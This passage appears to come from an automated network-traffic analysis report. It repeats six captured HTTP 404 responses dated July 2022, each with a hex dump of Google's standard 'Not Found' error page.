67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
